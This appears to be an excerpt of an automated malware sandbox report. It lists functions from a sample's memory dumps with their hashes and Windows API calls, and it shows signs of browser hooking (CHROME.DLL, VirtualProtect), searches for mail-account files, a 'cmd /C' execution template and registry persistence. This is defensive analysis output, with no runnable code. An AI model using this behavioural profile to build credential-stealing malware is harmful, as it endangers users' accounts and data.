  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB4E6, Relevance: 6.1, APIs: 4, Instructions: 57 Total matches: 46sleep
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
